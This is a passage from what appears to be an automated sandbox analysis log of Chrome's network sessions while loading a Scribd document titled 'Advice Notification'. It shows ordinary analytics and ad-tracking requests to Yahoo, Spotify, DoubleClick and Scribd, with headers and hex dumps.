                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: x*k#1rEHdOR\n&(~]1eU_!lD&M"K>`ZABGX7KO,.\`,-#k-k-m JO`22TM4M^L@UA=K=jzXX1HExjw88]$ pvcc8-`gkyM*BQuQ$
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: 05 76 44 e5 20 07 68 0a 5e 79 ca 95 f6 15 df 3d f5 5c 40 39 2b 5d 9b b5 5b aa ff d2 b6 76 85 67 b9 e7 89 45 35 ec d8 95 cd 5c 0e 5c a2 20 26 14 ad d5 77 0f 4d e8 9a b7 6c a0 ea a6 83 ca 42 a4 ee d1 04 94 68 09 52 f1 a0 96 d8 1a b3 63 ed ef 54 77 6a 2d 61 08 e0 83 5b 1e 23 1e 7a 60 38 2c 81 98 0d 40 10 95 3e e3 55 5b 38 5e ea 2d de 95 55 a7 92 90 61 09 98 16 89 04 1a 9b 4d c4 83 98 cc 69 70 e5 67 81 f3 18 66 17 61 46 d3 da 68 65 d3 ac 79 65 a4 42 98 06 88 6d 83 47 c5 fa 36 4f 43 1e cc 0e e3 cf f0 27 03 10 91 cd f1 fc 13 b8 85 b4 13 78 8b 64 ed 1c 1e 4f 4b 7c ab ec 7e e9 27 47 34 d8 e7 b7 27 e2 4d bc ac 60 45 4f 4d 43 53 22 fe d8 ba 78 fd f3 eb 4f 97 af df 96 47 e0 06 a3 ae 3b b1 f5 86 11 56 eb 8d 47 4a 10 dc 5f f0 82 e7 1e 82 1d 4a 99 c6 ab a9 19 5e 12 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: vD h^y=\@9+][vgE5\\ &wMlBhRcTwj-a[#z`8,@>U[8^-UaMipgfaFheyeBmG6OC'xdOK|~'G4'M`EOMCS"xOG;VGJ_J^w


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        96192.168.2.164983354.246.144.894436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1066OUTGET /sp.pl?a=10000&d=Fri%2C%2006%20Dec%202024%2021%3A59%3A27%20GMT&n=5&b=Advice%20Notification%20%7C%20PDF&.yp=10143699&f=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&enc=UTF-8&gdpr=0&us_privacy=1-N-&gpp=DBACOe~CQJNnEAQJNnEAEXikAENA0EwAP_gAEPgACiQGpQCgAGgAcABoAEUAJgAUABHALhAXmA1IC84A4AHAAaABFACYAFAARwC8wAA~BQJNnEAQJNnEAEXikAENA0CgAf_AAIfAAAalAKAAaABwAGgARQAmABQAEcAuEBeYDUgLzgDgAcABoAEUAJgAUABHALzA~1-N-&gpp_sid=6&yv=1.16.5&tagmgr=gtm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: sp.analytics.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC947INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, private, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                                        Server: ATS/9.1.10.144
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Via: http/1.1 traffic_server (ApacheTrafficServer/9.1.10.144)
                                                                                                                                                                                                                                                                                                                                                                                        Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: A3=d=AQABBMpzU2cCEJV-opIdkuWyW4wVQ-qrcuUFEgEBAQHFVGddZ9xS0iMA_eMAAA&S=AQAAAvzM2plJnFSLK2ss9K56YLw; Expires=Sun, 7 Dec 2025 03:59:38 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff ff ff ff 21 f9 04 04 14 00 ff 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        97192.168.2.164984035.186.224.244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC620OUTPOST /v1/ingest HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: pixels.spotify.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 531
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC531OUTData Raw: 7b 22 62 61 74 63 68 22 3a 5b 7b 22 70 69 64 22 3a 22 63 61 62 36 38 39 66 34 37 39 39 31 34 30 31 39 61 36 39 33 30 39 36 61 65 65 37 62 35 66 66 39 22 2c 22 73 69 64 22 3a 22 37 34 32 33 65 37 38 61 64 66 61 33 34 35 66 61 38 38 64 34 31 31 30 39 66 66 64 63 30 37 62 36 22 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 61 63 74 69 6f 6e 22 3a 22 76 69 65 77 22 2c 22 74 69 6d 65 22 3a 31 37 33 33 35 32 32 33 37 34 2e 31 32 38 2c 22 67 72 6f 75 70 22 3a 6e 75 6c 6c 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 65 78 70 65 72 69 6d 65 6e 74 22 3a 6e 75 6c 6c 2c 22 62 6f 64 79 22 3a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 63 72 69 62 64 2e 63 6f 6d 2f 64 6f 63 75 6d 65 6e 74 2f 38 30 31 35 31 39 32 39 31 2f 41 64 76 69 63 65 2d 4e 6f 74 69 66
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"batch":[{"pid":"cab689f479914019a693096aee7b5ff9","sid":"7423e78adfa345fa88d41109ffdc07b6","events":[{"action":"view","time":1733522374.128,"group":null,"label":null,"experiment":null,"body":{"url":"https://www.scribd.com/document/801519291/Advice-Notif
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC507INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        grpc-encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                        grpc-accept-encoding: gzip,x-snappy-framed
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        grpc-status: 0
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 52
                                                                                                                                                                                                                                                                                                                                                                                        date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Via: HTTP/2 edgeproxy, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC52INData Raw: 7b 0a 20 22 72 65 73 70 6f 6e 73 65 22 3a 20 22 61 66 37 65 31 37 37 31 62 39 64 33 34 30 33 62 38 36 64 63 66 63 64 32 61 62 63 32 37 65 66 61 22 0a 7d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: { "response": "af7e1771b9d3403b86dcfcd2abc27efa"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        98192.168.2.1649832142.250.181.664436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1433OUTGET /td/rul/991817613?random=1733522375967&cv=11&fst=1733522375967&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: td.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC954INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: IDE=AHWqTUkWUFsQvLQZk-4EI3fKIPjT4lq3O8BPJ3KYlT3sCMuMlsncJozI1dPMcGxO; expires=Sun, 06-Dec-2026 21:59:38 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC436INData Raw: 31 33 32 37 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6f 72 69 67 69 6e 2d 74 72 69 61 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 41 76 68 35 4e 79 30 58 45 46 43 79 51 37 2b 6f 4e 69 65 58 73 6b 55 72 71 59 38 65 64 55 7a 4c 35 2f 58 72 77 4b 6c 47 6a 41 52 51 48 57 34 54 46 52 4b 2b 6a 56 64 35 48 6e 44 49 70 59 32 30 6e 35 4f 4c 48 66 67 55 34 6b 75 37 78 34 38 4e 33 75 68 47 2f 41 30 41 41 41 42 78 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 52 76 64 57 4a 73 5a 57 4e 73 61 57 4e 72 4c 6d 35 6c 64 44 6f 30 4e 44 4d 69 4c 43 4a 6d 5a 57 46 30 64 58 4a 6c 49 6a 6f 69 55 48 4a 70 64 6d 46 6a 65 56 4e 68 62 6d 52 69 62 33 68 42 5a 48 4e 42 55 45 6c 7a 49 69 77 69 5a 58 68 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1327<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhw
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1390INData Raw: 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 2c 22 6e 61 6d 65 22 3a 22 34 73 31 31 38 32 32 38 31 34 38 30 2e 31 37 33 33 35 32 32 33 36 31 22 2c 22 62 69 64 64 69 6e 67 4c 6f 67 69 63 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 62 6a 73 22 2c 22 64 61 69 6c 79 55 70 64 61 74 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 75 70 64 61 74 65 3f 69 67 5f 6e 61 6d 65 3d 34 73 31 31 38 32 32 38 31 34 38 30 2e 31 37 33 33 35 32 32 33 36 31 5c 75 30 30 32 36 69 67 5f 6b 65 79 3d 31 73 4e 48 4d 78 4d 54 67 79 4d 6a 67 78 4e 44 67 77 4c 6a 45 33 4d 7a 4d 31 4d 6a 49 7a 4e 6a 45 21 32 73 5a 38
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ":"https://td.doubleclick.net","name":"4s1182281480.1733522361","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1182281480.1733522361\u0026ig_key=1sNHMxMTgyMjgxNDgwLjE3MzM1MjIzNjE!2sZ8
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1390INData Raw: 64 3d 31 36 33 35 37 38 30 36 35 39 32 35 5c 75 30 30 32 36 63 72 5f 69 64 3d 37 31 38 31 32 32 38 30 32 32 37 35 5c 75 30 30 32 36 63 76 5f 69 64 3d 30 5c 75 30 30 32 36 66 6f 72 6d 61 74 3d 24 7b 41 44 5f 57 49 44 54 48 7d 78 24 7b 41 44 5f 48 45 49 47 48 54 7d 5c 75 30 30 32 36 72 64 73 3d 24 7b 52 45 4e 44 45 52 5f 44 41 54 41 7d 5c 75 30 30 32 36 73 65 61 74 3d 32 5c 75 30 30 32 36 72 70 5f 69 64 3d 72 31 6a 36 34 38 36 35 32 30 31 35 34 21 34 73 2a 32 41 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 22 31 36 33 35 37 38 30 36 35 39 32 35 22 2c 22 37 31 38 31 32 32 38 30 32 32 37 35 22 2c 6e 75 6c 6c 2c 22 32 31 35 30 34 33 38 36 38 32 31 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 36 34 38 36 35 32
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: d=163578065925\u0026cr_id=718122802275\u0026cv_id=0\u0026format=${AD_WIDTH}x${AD_HEIGHT}\u0026rds=${RENDER_DATA}\u0026seat=2\u0026rp_id=r1j6486520154!4s*2A","metadata":["163578065925","718122802275",null,"21504386821",null,null,null,null,null,null,"648652
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1390INData Raw: 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 36 34 38 36 35 32 30 31 35 34 22 5d 2c 22 61 64 52 65 6e 64 65 72 49 64 22 3a 22 73 30 41 6d 5f 77 4a 6e 6f 66 59 22 2c 22 62 75 79 65 72 52 65 70 6f 72 74 69 6e 67 49 64 22 3a 22 31 6a 36 34 38 36 35 32 30 31 35 34 21 34 73 2a 32 41 22 7d 2c 7b 22 72 65 6e 64 65 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 73 66 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 61 64 66 65 74 63 68 2f 67 64 61 3f 61 64 67 5f 69 64 3d 31 36 37 39 33 34 31 38 35 30 30 39 5c 75 30 30 32 36 63 72 5f 69 64 3d 37 32 34 35 30 33 31 33 39 38 32 39 5c 75 30 30 32 36 63 76 5f 69 64 3d 30 5c 75 30 30 32 36 66 6f 72 6d 61 74 3d 24 7b 41 44 5f 57 49 44 54 48 7d 78 24 7b 41
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,null,null,null,null,null,null,"6486520154"],"adRenderId":"s0Am_wJnofY","buyerReportingId":"1j6486520154!4s*2A"},{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=167934185009\u0026cr_id=724503139829\u0026cv_id=0\u0026format=${AD_WIDTH}x${A
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC305INData Raw: 6e 64 73 29 3b 7d 65 6c 73 65 20 69 66 28 69 2e 61 63 74 69 6f 6e 3d 3d 31 29 7b 6e 61 76 69 67 61 74 6f 72 2e 6c 65 61 76 65 41 64 49 6e 74 65 72 65 73 74 47 72 6f 75 70 28 69 2e 69 6e 74 65 72 65 73 74 47 72 6f 75 70 41 74 74 72 69 62 75 74 65 73 29 3b 7d 7d 63 61 74 63 68 28 65 29 7b 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 28 60 68 74 74 70 73 3a 2f 2f 70 61 67 65 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 67 65 6e 5f 32 30 34 2f 3f 69 64 3d 74 75 72 74 6c 65 78 5f 6a 6f 69 6e 5f 69 67 26 74 78 5f 6a 69 67 3d 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 69 29 29 7d 26 74 78 5f 6a 65 6d 3d 24 7b 65 2e 6d 65 73 73 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: nds);}else if(i.action==1){navigator.leaveAdInterestGroup(i.interestGroupAttributes);}}catch(e){navigator.sendBeacon(`https://pagead2.googlesyndication.com/pagead/gen_204/?id=turtlex_join_ig&tx_jig=${encodeURIComponent(JSON.stringify(i))}&tx_jem=${e.messa
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        99192.168.2.1649841151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC508OUTOPTIONS /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-methods: POST
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890037-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin,Access-Control-Request-Method,Access-Control-Request-Headers
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        100192.168.2.1649843151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC645OUTGET /img/word_document/322011392/149x198/75a60db5ed/1732968212?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-2-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
